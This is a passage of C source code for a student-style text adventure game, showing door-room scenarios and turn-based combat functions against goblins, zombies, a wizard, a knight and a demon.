secretword[WORDSIZE+1]; fptr=fopen("inputWord.txt","r"); if(fptr==NULL) { printf("Could not open file"); } do { fscanf(fptr," %s",solution); LowerCaseWord(solution); CreateSecretWord(solution,secretword); PlayOneGame(solution,secretword); PlayAgain(&againPtr); } while(againPtr!=0); } break; } case 20: { while(choice != 99) { FILE *wRiter; FILE *reAder; puts("you open the door and find a rather normal room which has bed wiht blue covers and a broken down wardrobe"); puts("Around the room there is also a strange substance dripping from the ceiling"); puts("Do you \n(1)walk towards the bed \n(2)Examine the wardrobe \n(3)walkback out"); scanf("%d",&choice); if (choice ==1) { puts("Its a rather plain bed with nothing there"); puts("It looks rather comfortable so you decide to take a nap"); puts("zzzzzz"); puts("zzzzzz");puts("zzzzzz"); puts("zzzzzz");puts("zzzzzz"); puts("zzzzzz");puts("zzzzzz"); puts("zzzzzz");puts("zzzzzz"); puts("zzzzzz");puts("zzzzzz"); puts("zzzzzz");puts("zzzzzz"); puts("You awaken and notice somthing in your pocket"); wRiter = fopen("Looking_for_help.txt","w"); fprintf(wRiter, "Dear %s,\n",name); fprintf(wRiter,"My name is Abetha Winson I'm soory im bit shy so decided to write you this letter,\n The problem is that I have been stuck whitin this room.\n"); fprintf(wRiter,"I saw you sleeping on the bed and I was wondering if you may lend me a hand.\n"); fprintf(wRiter,"It seems as though I have become invisable but that is not important right now.\n"); fprintf(wRiter,"What I want is number to one be seen again and number two is to escape this retched room.\n"); fprintf(wRiter,"So what do you say will you help?\n"); choice =99; } else if(choice == 2) { puts("There seems to be somthing odd about this wardrobe"); puts("you step inside and..."); puts("...\n...\n...\n...\n...\n..."); puts("find nothing but an empty wardrobe"); choice =99; } else if(choice ==3) { puts("You go to open the door but find that at the other side of the door has been walled off"); choice =99; } else { puts("You continue standing at the entrance contemplating life"); choice =99; } } break; } case 21: { puts("you open the door and find a skeleton in a suit."); printf("It invites you to play a game of blackjack. "); printf("If you win, it will grant you a wish, but if you lose "); printf("you must stay trapped in this room as its card playing "); puts("buddy forever."); puts("Will you play?"); puts("1. Yes."); puts("2. No."); scanf("%d",&choice); int timesPlayed = 0; if(choice == 1) { int cont = 0; int cards[2] = {}; while(cont != 1) { cards[0] = (1 + (rand() % 13)); int *ptr = cards; blackJack(ptr); timesPlayed++; printf("Before you can even decide on what to do with "); printf("your hand, The Skeleton reveals a Blackjack. "); puts("you should've known it was a cheater"); printf("The Skeleton says it will give you another "); puts("chance."); puts("will you play again?"); puts("1. Yes"); puts("2. No"); scanf("%d", &choice); if(choice == 2) { //name to caps char str[256] = {}; int i = 0; while(name[i]) { str[i] = toupper(name[i]); i++; } printf("You've accepted your fate, %s, and ", str); puts("you are trapped forever."); cont = 1; } } FILE *wptr = fopen("timesPlayed.txt", "w"); fprintf(wptr, "Played BlackJack %d times", timesPlayed); puts("Number of times played written to file timesPlayed.txt"); } else if(choice == 2) { printf("Seeing as it isn't even Halloween season "); printf("you decide not to humor The Skeleton. "); puts("You exit the room."); } break; } case 22: { while(choice != 99) { puts("you open the door and find ........\n"); puts("Mike Tyson is looking at you menacingly\n"); puts("suddenly he bites you ear off\n"); puts("he wants to go 20 rounds with you pretty much beat you to death, which one do you choose?\n"); printf("1. Accept the challenge and fight him\n"); printf("2. Run and scream like a girl\n"); printf("3. Get punched\n"); scanf("%d",&choice); if (choice == 1) { puts("Goodluck buddy hope you make it alive"); break; } else if (choice == 2) { puts("Good choice, run as fast as you can!"); break; } else { puts("Look on the bright side, you can attempt a lawsuit and get paid"); break; } } break; } case 23: { while(choice != 99) { puts("you open the door and find another door"); scanf("%d",&choice); } break; } case 24: { while(choice != 99) { puts("you open the door and find ........"); scanf("%d",&choice); } break; } case 25: { while(choice != 99) { puts("You open the door and close it behind you."); puts("After you overcome the panic from almost drowning, you look around and You find yourself in a cave, the air is damp and you smell mold."); puts("You notice a skeleton at your feet with it's right hand clenched around something. The cave ahead leads to a tunnel and you see a door to your right."); puts("At this point you have 3 choices:"); puts("1. Examine the skeleton."); puts("2. Proceed further ahead in the cave."); puts("3. Enter the door to your right."); scanf("%d",&choice); if(choice == 1) { puts("You reach down and pry open the skeleton's hand, a finger breaks loose and you place it in your pocket. Once you pry the opject free you look at it closely in the light and see it is a live grenade and the pin springs free. You drop the grenade and dash through the cave. You can hear the grenade explode, collapsing the tunnel behind you."); puts("To be continued..."); break; } else if(choice == 2) { puts("You find yourself further ahead in the cave."); puts("To be continued...."); break; } else if(choice == 3) { puts("You enter the and close the door behind you."); printf("You hear an loud voice \" %s why do you disturb me? \" \n",name); puts("To be continued...."); break; } else { puts("wrong choice"); } } break; } } } } //case 1 functions int combo() { int n; srand(time(NULL)); //return n = rand() % 100 + 3; return n = (rand() % (1000 - 0 + 1)) + 0; } int countDown() { int c, d; for (c = 1; c <= 32767; c++) for (d = 1; d <= 32767; d++) { } printf("\nTime's out!\n"); return 1; } int displayRiddle() { FILE *fptr; char filename[100], c; // Open file fptr = fopen("riddle.txt", "r"); if (fptr == NULL) { printf("Cannot open file \n"); exit(0); } // Read contents from file c = fgetc(fptr); while (c != EOF) { printf ("%c", c); c = fgetc(fptr); } fclose(fptr); return 0; } void printerGoblin(int *ptr) { int i; for(i=0;i<10;i++) { printf("Numbers are : %d\n",*(ptr+i)); } } void randomFillGob(int *ptr) { int i; srand(time(0)); for(i=0;i<10;i++) { *(ptr+i)=55+(rand() % (205-55)); } } void sorterGoblin(int *ptr) { int i,j,tmp; for(i=0;i<10;i++) { for(j=0;j<10;j++) { if(*(ptr+i)<*(ptr+j)) { tmp=*(ptr+i); *(ptr+i)=*(ptr+j); *(ptr+j)=tmp; } } } } int goblin(int choice) { int y; int health=100; int ghealth=50; srand(time(NULL)); int damage = 0; int gdamage =0; if(choice==1) { printf("\n'So you have chosen to fight me'\n"); printf("The goblin has 50 Health\n"); printf("\nChoose your Weapon: \n"); printf("1. Dagger: 'Fast but close combat.' (+10 Attack, +10 in speed)\n"); printf("2. Longsword: 'Slow but hits hard.' (+30 Attack, -10 in speed)\n"); printf("3. Broadsword and shield: 'Average sword but comes with shield that will slow you down.'(+20 Attack, -20 Speed, +20 Defense)\n"); printf("4. Two Handed Sword: 'Very Very Slow but hard hitting.'(+50 Attack, -50 Speed) \n"); printf("5. Bow and Arrows: 'Works well with enemies that are far away'(+15 Ranged, +10 attack)\n"); printf("Choose wisely...\n"); scanf("%d",&y); switch(y) { case 1: printf("You chose the dagger\n"); while(ghealth>0) { gdamage = 1+(rand()%10); printf("You hit the Goblin and deal %d damage\n",gdamage); ghealth = ghealth - gdamage; printf("The goblin is left with %d health\n",ghealth); damage = 1+(rand()%10); printf("The goblin hits you back and deal %d damage\n",damage); health = health - damage; if(ghealth<0) { printf("The goblin is dead\n"); } } break; case 2: printf("You chose the Longsword\n"); while(ghealth>0) { gdamage = 1+(rand()%30); printf("You hit the Goblin and deal %d damage\n",gdamage); ghealth = ghealth - gdamage; printf("The goblin is left with %d health\n",ghealth); damage = 1+(rand()%10); printf("The goblin hits you back and deal %d damage\n",damage); health = health - damage; if(ghealth<0) { printf("The goblin is dead\n"); } } break; case 3: printf("You chose the Broadsword and shield\n"); while(ghealth>0) { gdamage = 1+(rand()%20); printf("You hit the Goblin and deal %d damage\n",gdamage); ghealth = ghealth - gdamage; printf("The goblin is left with %d health\n",ghealth); damage = 1+(rand()%10); printf("The goblin hits you back and deal %d damage\n",damage); health = health - damage; if(ghealth<0) { printf("The goblin is dead\n"); } } break; case 4: printf("You chose the Two Handed Sword\n"); while(ghealth>0) { gdamage = 1+(rand()%50); printf("You hit the Goblin and deal %d damage\n",gdamage); ghealth = ghealth - gdamage; printf("The goblin is left with %d health\n",ghealth); damage = 1+(rand()%10); printf("The goblin hits you back and deal %d damage\n",damage); health = health - damage; if(ghealth<0) { printf("The goblin is dead\n"); } } break; case 5: printf("You chose Bow and Arrows\n"); while(ghealth>0) { gdamage = 1+(rand()%15); printf("You hit the Goblin and deal %d damage\n",gdamage); ghealth = ghealth - gdamage; printf("The goblin is left with %d health\n",ghealth); damage = 1+(rand()%10); printf("The goblin hits you back and deal %d damage\n",damage); health = health - damage; if(ghealth<0) { printf("The goblin is dead\n"); } } break; } } return health; } int blackPotionEffect() { int poSelect = rand() % 5; switch(poSelect) { case 0: puts("You awaken outside and are able to select another door, that all seemed pointless."); return 0; puts(""); break; case 1: puts("You die, bad luck I guess."); return 1; puts(""); exit(0); case 2: puts("That tasted like pineapples, why does everything taste like pineapples?"); puts("The door behind you unlocks and you leave the room..."); return 2; break; case 3: puts("You awaken to a new world, one full of hope and promise..... or maybe you're still dreaming?"); puts("The door behind you unlocks and you leave the room..."); return 3; break; case 4: puts("It was just oddly colored milk..."); puts("The door behind you unlocks and you leave the room..."); return 4; break; } } int randGen(int topNum) { int x=0; int maxNum = topNum; x = 1 + (rand() % maxNum); return x; } void bluePotionWorld() { int i, j, k; char poChoice[5]; printf("You awaken and notice everything is backwards....\n"); printf("You see two potions on the table, one black as the night sky, and a green one.\n"); printf("Which would you like to drink? (black / green)\n"); scanf("%s", &poChoice); if(strcmp(poChoice, "green") == 0) { i = blackPotionEffect(); } if(strcmp(poChoice, "black") == 0) { puts("You noticed it tasted like rancid milk"); puts("You begin to feel nauseous...."); puts("You have died."); exit(0); } } void rm11EnemyName(char *enPtr) { FILE *rptr; char chTemp[30]; int itr=0, temp=0; if((rptr = fopen("enemynames.txt", "r")) == NULL) { printf("Error: File could not be opened.\n\n"); strcpy(enPtr, "Angry Wild-Beast"); } else { // scans for the descriptive verb of the enemy in the file temp = 1 + (rand() % 30); fscanf(rptr, "%s", chTemp); while(itr != temp) { itr++; fscanf(rptr, "%s", chTemp); } strcpy(enPtr, chTemp); // the words lists are separated by the digit 2 while(!isdigit(chTemp[0])) { fscanf(rptr, "%s", chTemp); } // scans for the name of the enemy in the file itr=0; temp = 1 + (rand() % 19); fscanf(rptr, "%s", chTemp); while(itr != temp) { fscanf(rptr, "%s", chTemp); itr++; } strcat(enPtr, chTemp); } fclose(rptr); } void rm11Dialog(int temp, char *enPtr, char *nmPtr) { if(temp == 0) { printf("The old dwarf, looking disappointed, sits back down.\n"); printf("\nYou turn around and exit the room.\n"); } else if(temp == 1) { printf("\nYou open the door and find yourself at the edge of a forest.\n"); printf("Sitting on an old fallen log is an old, grey bearded dwarf\n"); printf("smoking his pipe.\n"); printf("The dwarf gets up and greets you.\n"); printf("\"Hello there! I am in need of help crossing this forest!\"\n"); printf("\"What do you say, will you help me\", asks the old dwarf.\n"); printf("------------------------------------------------------------\n\n"); printf("- yes\n- no\nEnter your choice: "); } else if(temp == 2) { printf("\n\"Excellent! Let us depart then before sunset!\"\n"); printf("The old dwarf and you begin your journey into the\n"); printf("forest. The forest is quiet, eerie, and unsettling but the\n"); printf("dwarf is calm. He recounts to you old stories of his past\n"); printf("but is interrupted by the howl of some beast!\n"); printf("\"Quiet..\" says the old dwarf.. \n"); printf("------------------------------------------------------------\n\n"); printf("\"Over there %s! Its a %s!\",\n", nmPtr, enPtr); printf("yells the dwarf!\n"); } } void rm11Battle(int *ptr, char *enPtr, char *nmPtr) { int win=0, die=0; char ch=0; // elem 0: your health, elem 1: dwarf health, elem 2: enemy health printf("\nThe old dwarf and you have now entered into a battle!\n"); // win is 1, lose is 2 while(win <=0 || win > 3) { printf("\n------------------------------------------------------\n"); printf("%s's health: %d\t",nmPtr, *(ptr+0)); printf("||\tOld Dwarfs health: %d\n", *(ptr+1)); printf("------------------------------------------------------\n"); printf("%s's health: %d\n", enPtr, *(ptr+2)); printf("------------------------------------------------------\n\n"); printf("OPTIONS\n"); printf("------------------\n"); printf("- Sword Attack (s)\n"); printf("- Dwarf Attack (d)\n"); printf("Enter the letter next to the choice: "); scanf(" %c", &ch); if(ch == 's' || ch == 'S') { die = (rand() % 6) + 1; printf("\nYou thrust you sword towards the %s\n", enPtr); if(die == 1) { printf("but you are short and only scrape it!\n"); printf("The %s counter and hits you!\n", enPtr); *(ptr+0) -= 1; *(ptr+2) -= 1; } else if(die == 2) { printf("and your sword makes solid contact with it!\n"); printf("The %s is slightly damaged\n", enPtr); *(ptr+2) -= 2; } else if(die == 3) { printf("and your sword draws blood from it!\n"); printf("The %s has taken damage.\n", enPtr); *(ptr+2) -= 3; } else if(die == 4) { printf("and your sword causes destructive damage!\n"); printf("The %s staggers from the intense blow.\n", enPtr); *(ptr+2) -= 4; } else if(die == 5) { printf("and your sword causes critical damage!\n"); printf("The %s has taken critical damage!\n", enPtr); *(ptr+2) -= 5; } else { printf("and your sword damages the beast and as \n"); printf("the beast staggers around you are able to\n"); printf("land another blow!\n"); printf("The %s has taken ultra X2 critical damage!\n", enPtr); printf("The god Ares saw this and gives you a thumbs up!\n"); printf("You have gained health!\n"); *(ptr+0) += 2; *(ptr+2) -= 7; } } else if(ch == 'd' || ch == 'D') { die = (rand() % 6) + 1; printf("\nThe old dwarf prepares his axe!\n"); if(die == 1) { printf("The old dwarf trips on a rock, hurting his hip!\n"); printf("The %s tries to attack him but you \n", enPtr); printf("block its blow and take damage!\n"); *(ptr+0) -= 2; *(ptr+1) -= 1; } else if(die == 2) { printf("The dwarf feels extra manly and drops his axe!\n"); printf("The dwarf punches the %s!\n", enPtr); printf("The %s take no damage...\n", enPtr); printf("The dwarfs pride is slightly damaged.\n"); *(ptr+1) -= 1; } else if(die == 3) { printf("The dwarf hits the %s with his axe!\n", enPtr); printf("The %s has taken damage.\n", enPtr); *(ptr+2) -= 2; } else if(die == 4) { printf("The dwarf throws his axe and misses!\n"); printf("The dwarfs pride is slightly damaged.\n"); *(ptr+1) -= 1; } else if(die == 5) { printf("The dwarf hits the %s with his axe!\n", enPtr); printf("The %s has taken damage!\n", enPtr); *(ptr+2) -= 2; } else { printf("The dwarf hands you a malt beer and you both\n"); printf("chug the drink!\n"); printf("The dwarf and you gain health and power!\n"); printf("The dwarf and you both attack the %s,\n", enPtr); printf("it is overpowered and takes many blows!\n"); printf("The %s has taken x3 ultra critical damage!\n", enPtr); *(ptr+0) += 2; *(ptr+1) += 2; *(ptr+2) -= 9; } } else { printf("You have entered the wrong choice!\n"); printf("In your confusion, the %s strikes you!\n", enPtr); *(ptr+0) -= 1; } die = (rand() % 6) + 1; printf("\nThe %s rushes towards you and the dwarf!\n", enPtr); if(die == 1) { printf("You and the dwarf dodge the attack!\n"); } else if(die == 2) { printf("It attacks and slightly damages the dwarf!\n"); *(ptr+1) -= 1; } else if(die == 3) { printf("It attacks and slightly damages you!\n"); *(ptr+0) -= 1; } else if(die == 4) { printf("It attacks and damages the dwarf!\n"); *(ptr+1) -= 2; } else if(die == 5) { printf("It attacks and damages you!\n"); *(ptr+0) -= 2; } else { printf("but at the last minute hesitates and heals itself!\n"); *(ptr+2) += 5; } if(*(ptr+0) <= 0) { printf("\nYou died!\n"); printf("Game Over!\n\n"); win = 2; } else if(*(ptr+1) <= 0) { printf("\nThe dwarf died!\n"); printf("Game Over\n\n"); } else if(*(ptr+2) <= 0) { printf("\nThe %s dies. You win!\n", enPtr); printf("You and the dwarf exit the forest safely!\n"); printf("Congratulations!\n\n"); win = 2; } } } void blackJack(int *cards) { puts("The Skeleton laughs and deals each of you 2 cards"); if(*cards == 1) { puts("Your first card is an Ace"); } else if(*cards > 10) { printf("Your first card is a "); if(*cards == 11) { puts("Jack"); } else if(*cards == 12) { puts("Queen"); } else if(*cards == 13) { puts("King"); } } else { printf("Your first card is a %d\n", *cards); } //card2 *(cards+1) = (1 + (rand() % 13)); if(*(cards+1) == 1) { puts("Your second card is an Ace"); } else if(*(cards+1) > 10) { printf("Your second card is a "); if(*(cards+1) == 11) { puts("Jack"); } else if(*(cards+1) == 12) { puts("Queen"); } else if(*(cards+1) == 13) { puts("King"); } } else { printf("Your second card is a %d\n", *(cards+1)); } } void rollDiceRoom17(int *arr) { int diceRollResult; int i; srand(time(NULL)); for (i = 0; i < 2; i++) { diceRollResult = (rand() % 12) + 1; *arr = diceRollResult; arr++; } } int zom(int health,int* wepP,int wepr) { int att = 0; //used for wizard attack build int op; //attack/roll/forward /back int build = 0; //knife bleed dmg //zombie health int zom = 50; int zomD = 10; int zomA = 1; //used to find zombie attack puts("\nYou move forward and a zombie holding a knife charges at you"); while(zom > 0) { if(health <= 0) { dead(); return 2; } printf("Your Health: %d\n",health); printf("Your Range: %d\n",wepr); printf("Zombie Health: %d\n",zom); printf("Zombie Distance: %d\n",zomD); puts("1 - Attack!\n2 - Dodge left\n3 - Dodge right\n4 - Fall back\n5 - Charge Forward"); scanf("%d",&op); switch (op) { case 1: //Sword Attack if(wepr == 10) { if(zomD <= 5) { puts("Too close!"); puts("The zombie drops his shoulder and you flip over him"); health -= 5; puts("You scramble to get up"); puts("The zombie turns around."); zomA = 0; zomD = 5; break; } else if(zom < 21) { puts("With 1 final thrust you slice the zombie in 2\n"); zom -= *wepP; break; } else { puts("The zombie charges at you closing the distance!"); puts("You slice the zombie as he tumbles over you"); zomD = 5; zom -= *wepP; } } //Knife Attack else if(wepr == 5) { if(wepr < zomD) { puts("Too Far away!"); break; } if(zom < 6){ puts("You thrust your knife in the zombies skull!"); puts("He grouns as he falls to the floor"); puts(""); zom -= *wepP; } else { zomA = 1; puts("You stab the zombie in the head and flip over him"); if(build == 4) { zom -= *wepP * 8; build = 0; } else { build++; zom -= *wepP; } zomD = 1; } } //Bow attack else if(wepr == 30) { if(wepr < zomD) { puts("Too Far away!"); break; } if(zom < 11) { puts("You pull harder on your bow and fire 1 final arrow!\n"); puts("It hits the zombie in the forehead as he falls to the ground sliding to your feet.\n"); zom -= *wepP; break; } int crit = rand() % 100 + 1; if(crit > 79) { zom -= (*wepP)*2; puts("You launch a tremendus amount of arrows and hit the zombie in the head!"); } else { puts("You launch arrows at the zombie and hit him in the chest!"); zomA = 1; zom -= *wepP; zomD -= 10; } puts("You position yourself away from the zombie before he gets up"); } //wiz class else if(wepr == 50) { if(wepr < zomD) { puts("Too Far away!"); break; } if(att == 1) { if(zom < 51) { puts("Your staff starts to glow immensy and a fireball is expanding at the tip of your staff!\n"); puts("As the Zombie charges forward you thrust your staff in its direction!\n"); puts("The fireball is launched from your staff hitting the zombie and burning him to a crisp.\n"); puts("There is nothing left of the zombie except a black mark on the ground\n"); zom -= *wepP; } else { att = 0; puts("You hurl a fireball from your staff had hit the zombie!"); zom -= *wepP; zomD -= 10; } } else { puts("You start speaking an ancient language and your staff starts to glow!"); att = 1; zomA = 1; zom -= 10; } } break; case 2: puts("You dodge left and the zombie stumbles over"); zomA = 0; break; case 3: puts("You dodge Right and the zombie misses you"); zomA = 0; break; case 4: puts("You fall back!"); zomA = 0; zomD += 10; break; case 5: puts("You charge towards eachother!"); zomD -= 10; if(zomD < 3) { puts("Too close!"); puts("The zombie drops his shoulder and you flip over him"); health -= 5; puts("You scramble to get up"); puts("The zombie turns around."); zomA = 0; zomD = 5; break; } default: puts("you freeze and the zombie Stabs you!"); health -= 20; } if(zomA == 1) { if(zomD > 20) { puts("The zombie charges towards your direction."); zomD -= 19; } else { puts("The zombie charges you and catches his kife in you!"); health -= 10; } } } return 0; } int wiz(int health,int* wepP,int wepr) //fire { int att = 0; //Used for wizard charged attack int op; int build = 0; //wizard health int wiz = 150; int wizR = 50; int wizD = 20; int wizA = 0; //determines the wizards attack and charge phase int cover = 0; //determines if you are in cover 0-open 1-incover puts("\nYou hear a cackle in the center of the library."); puts("\nYou see a wizard standing there talking in a foregn languege.\nHe is holding a fireball in his right hand, and an old tome in his left.\n"); puts("Suddenly a fire ball is hurled at you.\n"); puts("You barely dodge it as it scorches your hair.\n"); while(wiz > 0) { if(health <= 0) { puts("The wizard casts a wave of fire.\nYou are consumed and burned to a crisp!\n"); return 2; } printf("Your Health: %d\n",health); printf("Your Range: %d\n",wepr); printf("Wizard Health: %d\n",wiz); printf("Wizard Distance: %d\n",wizD); puts("1 - Attack!\n2 - Dodge Left\n3 - Dodge Right\n4 - Fall Back\n5 - Move Forward\n"); scanf("%d",&op); switch (op) { case 1: //Attack //Sword Attack if(wepr == 10) { //If you are too close to the wizard if(wizD > 10) { puts("Too far away!"); break; } //If you are about to kill the wizard if(wiz < 21) { puts("You charge the wizard sweeping your sword!"); puts("You catch his arm and his staff flys off. His staff is consumed by fire."); puts("The fire catches your sword and encases it with fire."); puts("Your sword now does more damage!"); wiz -= *wepP; *wepP += 20; break; } //normally hitting the wizard (takes you out of cover) else { puts("You Charge forward and thrust your sword at the wizard."); wiz -= *wepP; cover = 0; } } //Knife Attack else if(wepr == 5) { //If you are too close to the wizard if(wizD > wepr) { puts("Too far away!"); break; } //Final strike if(wiz < 6) { puts("With 1 final slice you throw your knife striking the wizards chest\n"); puts("He shreks as he falls towards the ground"); puts("The fire from his staff catches your knife and encases it with fire."); puts("Your knife now does more damage!"); wiz -= *wepP; *wepP += 20; break; } else { puts("You slice with your knife!"); cover = 0; if(build == 3) { wiz -= (*wepP * 8); build = 0; } else { build++; wiz -= *wepP; wizD = 5; } } } //bow attack else if(wepr == 30) { //If you are too close to the wizard if(wizD < wepr) { puts("Too close!"); puts("The wizard throws magic tonic in your direction!"); health -= 5; break; } //Killing the wizard if(wiz < 11) { puts("You fire multiple arrows from your bow.\nThey hit the wizards staff with a couple hitting his chest.\n"); puts("He shrikes in pain and falls to the floor.\n You hear the horn of gondor in the distance."); puts("The fire catches your quiver and encases it with fire."); puts("Your arrows now does more damage!"); wiz -= *wepP; *wepP += 20; break; } else { puts("You quick lauch a swarm of arrows towards the wizard"); wiz -= *wepP; } } //staff attack else if(wepr == 50) { if(wizD < wepr) { puts("Too close!"); puts("The wizard throws magic tonic in your direction!"); health -= 5; break; } //Casting phase if(att == 1) { //Killing the wizard if(wiz < 51) { puts("Your staff starts to glow immensy and a fireball is expanding at the tip of your staff!\n"); puts("The fireball is launched from your staff hitting The wizards Staff.\n"); puts("The staff explodes and the wizard is launched across the room.\n"); puts("The wizards fire catches your staff and encases it with fire."); puts("Your staff now does more damage!"); wiz -= *wepP; *wepP += 20; } //Hitting the wizard else { att = 0; puts("You hurl a fireball from your staff!"); wiz -= *wepP; wizD -= 10; } } //Charging phase else { puts("You start speaking an ancient language and your staff starts to glow!"); att = 1; } } break; case 2: puts("You Quickly scramble to the left and find the closest bookshelf for cover."); cover = 1; break; case 3: puts("You Quickly scramble to your right and find the closest bookshelf for cover."); cover = 1; break; case 4: puts("You scramble to find cover away."); cover = 1; wizD += 10; break; case 5: puts("You charge closer to the wizard keeping in cover!"); cover = 1; wizD -= 5; break; default: if(cover == 0) { puts("Unable to think you take the full fire ball!"); health -= 40; } else { puts("Unable to think your cover is consumed by fire!"); cover = 0; } } if(wizA == 1) { if(cover == 0) { puts("The wizard catches you outside of cover and you are hit with the fireball!"); health -= 20; wizA = 0; } else if(cover == 1) { puts("The fireball hits your cover and burns the bookshelf to ash!"); cover = 0; wizA = 0; } } else if(wizA == 0 && wiz > 0) { puts("You hear the wizard wispering into his staff as it starts to glow!"); wizA = 1; } if(wiz < 0) { puts("The wizard yells in terror before falling to the floor."); } } return 0; } int kni(int health,int* wepP,int wepr) //dark { int att = 0; //Used for wizard class charged attack int op; int build = 0; int dodge = 0; //determines if the knights attack is going to hit //knight stats int kni = 250; int kniR = 20; int kniD = 40; int kniA = 0; //determines the knights attack and charge phase //Intro to knight puts("You see a black knight praying in the center of the temple.\n"); puts("After you fully come through the door. It shuts behind you and disappears."); puts("The slaming of the door gets the knights attention and he stands up and draws his sword"); while(kni > 0) { if(health <= 0) { //When you die to the Knights puts("The knight pierces your stomach and you are lifted into the air.\nHe throws you across the temple!"); return 2; } printf("Your Health: %d\n",health); printf("Your Range: %d\n",wepr); printf("Knight Health: %d\n",kni); printf("Knight Distance: %d\n",kniD); puts("1 - Attack!\n2 - Dodge Left\n3 - Dodge Right\n4 - Fall Back\n5 - Move Forward\n"); scanf("%d",&op); switch (op) { case 1: //Attack //Sword Attack if(wepr == 10) { //If you are too far away if(kniD > 10) { puts("Too far away!"); break; } //If you are about to kill the knight if(kni < 21) { puts("You quickly slice the knights leg causing him to fall down.\nWhile he is down you bury your flaming sword in his neck"); kni -= *wepP; *wepP += 20; break; } //normally hitting the knight else { puts("You quickly attack the knight!"); kni -= *wepP; dodge = 0; } } //Knife Attack else if(wepr == 5) { //If you are too close to the wizard if(kniD > wepr) { puts("Too far away!"); break; } //Final strike if(kni < 6) { //Killing the knight with knife puts("In quick succession you slice the knight through his armor."); puts("Your blade taking dark energy with every stroke."); puts("He finally collapses from the attacks"); kni -= *wepP; *wepP += 20; break; } else { puts("You stab with your knife!"); dodge = 0; if(build == 3) { kni -= (*wepP * 8); build = 0; } else { build++; kni -= *wepP; kniD = 5; } } } //bow attack else if(wepr == 30) { //If you are too close to the wizard if(kniD < wepr) { puts("Too close!"); puts("The knight kicks you away!"); health -= 5; kniD += 5; break; } //Killing the knight if(kni < 11) { puts("With rapid succession you are able to launch flaming arrows from your bow."); puts("Landing in the chest of the knight."); puts("Dark energy starts to envelop the floor as the knight falls"); puts("Once the dark energy falls to the floor it quickly jumps onto you."); puts("surrounding you until it finally stops in your quiver."); puts("\nYour Arrows are now combined with dark energy!"); kni -= *wepP; *wepP += 20; break; } //Normal attack else { puts("You quick lauch a swarm of arrows towards the knight"); kni -= *wepP; dodge = 0; } } //staff attack else if(wepr == 50) { if(kniD < wepr) { puts("Too close!"); puts("The Knight Kicks you away!"); health -= 5; kniD += 5; break; } //Casting phase if(att == 1) { //Killing the knight if(kni < 51) { //kill dialog puts("You cast a wave of fire from your staff."); puts("The knight is soon entomed in fire."); puts("The knights armor drops to the floor, as there is no body inside."); kni -= *wepP; *wepP += 20; } //Hitting the knight else { att = 0; puts("You hurl a fireball from your staff!"); kni -= *wepP; kniD -= 10; dodge = 0; } } //Charging phase else { puts("You start speaking an ancient language and your staff starts to glow!"); att = 1; } } break; case 2: puts("You roll to the left!"); dodge = 1; break; case 3: puts("You roll to the right!"); dodge = 1; break; case 4: puts("You fall back!"); kniD += 10; break; case 5: puts("You move closer to the knight!"); kniD -= 5; break; default: if(dodge == 0) { puts("The knight barely scathes your clothes."); kniA = 0; } else { puts("The Knight Drops his sword on you!"); health -= 40; kniA = 0; } } //End of switch statement if(kniA == 1) { if(dodge == 0) { puts("The Knight moves in and slashes you with his sword!"); health -= 20; kniA = 0; } else if(dodge == 1) { puts("The knights attack missed!"); dodge = 0; kniA = 0; } } else if(kniA == 0 && kni > 0) { puts("The Knight gets into position to attack!"); kniA = 1; } if(kni <= 0) { puts("You see the knights Sword standing from the ground"); } } return 0; } int dem(int health,int* wepP,int wepr) //blood { int att = 0; //Used for wizard class charged attack int op; int build = 0; int dodge = 0; //determines if the demons attack is going to hit //Demon stats int dem = 250; int demR = 20; int demD = 40; int demA = 0; //determines the knights attack and charge phase //Intro to demon puts("You walk though the black door. Surrounding you is a lake of fire"); puts("From the fire a monsterus demon emerges. He is double your height appoximatly."); puts("With a fit of rage he thrusts his hand out as a teather of blood runs from his hand and is launched in your direction"); while(dem > 0) { if(health <= 0) { //When you die to the Demon puts("The Demon picks you up and swallows you whole!"); return 2; } printf("Your Health: %d\n",health); printf("Your Range: %d\n",wepr); printf("Demon Health: %d\n",dem); printf("Demon Distance: %d\n",demD); puts("1 - Attack!\n2 - Dodge Left\n3 - Dodge Right\n4 - Fall Back\n5 - Move Forward\n"); scanf("%d",&op); switch (op) { case 1: //Attack //Sword Attack if(wepr == 10) { //If you are too far away if(demD > 10) { puts("Too far away!"); break; } //If you are about to kill the knight if(dem < 21) { puts("You make 1 final thrust at the Demon.\nYour swords fire and darkness envelop the Demon and his chest burts open!"); dem -= *wepP; *wepP += 20; break; } //normally hitting the knight else { puts("You quickly attack the demon!"); dem -= *wepP; dodge = 0; } } //Knife Attack else if(wepr == 5) { //If you are too close to the wizard if(demD > wepr) { puts("Too far away!"); break; } //Final strike if(dem < 6) { //Killing the demon with knife puts("You dodge the demons attack and finally jump onto his back!"); puts("As the demon yells out in anger you make one last slash through the back of his neck."); puts("The demon falls to the floor!"); dem -= *wepP; *wepP += 20; break; } else { puts("You stab with your knife!"); dodge = 0; if(build == 3) { dem -= (*wepP * 8); build = 0; } else { build++; dem -= *wepP; demD = 5; } } } //bow attack else if(wepr == 30) { //If you are too close to the demon if(demD < wepr) { puts("Too close!"); puts("The Demon picks you up and throws you across the room!"); health -= 15; demD += 5; break; } //Killing the demon if(dem < 11) { puts("You sweep around the demon and cut flaming arrows in his back."); puts("From your arrows the darkness surrounds the demon holding him down."); puts("You bury as meny arrows into it as fast as possible.The demon falls to the floor."); dem -= *wepP; *wepP += 20; break; } //Normal attack else { puts("You quick lauch a swarm of arrows towards the Demon"); dem -= *wepP; dodge = 0; } } //staff attack else if(wepr == 50) { if(demD < wepr) { puts("Too close!"); puts("The Demon picks you up and throws you across the room!"); health -= 15; demD += 15; break; } //Casting phase if(att == 1) { //Killing the demon if(dem < 51) { //kill dialog puts("You cast a black fireball from your staff"); puts("You launch the fireball from your and it consumes the demon"); puts("The demon falls to the floor at your feet. Darkness bleeding from the demon."); dem -= *wepP; *wepP += 20; } //Hitting the demon else { att = 0; puts("You hurl a fireball from your staff!"); dem -= *wepP; demD -= 10; dodge = 0; } } //Charging phase else { puts("You start speaking an ancient language and your staff starts to glow!"); att = 1; } } break; case 2: puts("You roll to the left!"); dodge = 1; break; case 3: puts("You roll to the right!"); dodge = 1; break; case 4: puts("You fall back!"); demD += 10; break; case 5: puts("You move closer!"); demD -= 5; break; default: if(dodge == 0) { puts("The Demon Slams his fists into the ground narrowly missing you"); demA = 0; } else { puts("The Demon Slams his fists down crushing you!"); health -= 40; demA = 0; } } //End of switch statement if(demA == 1) { if(dodge == 0) { puts("The Demon swipes his hand at you and throws you across the room"); health -= 20; demA = 0; } else if(dodge == 1) { 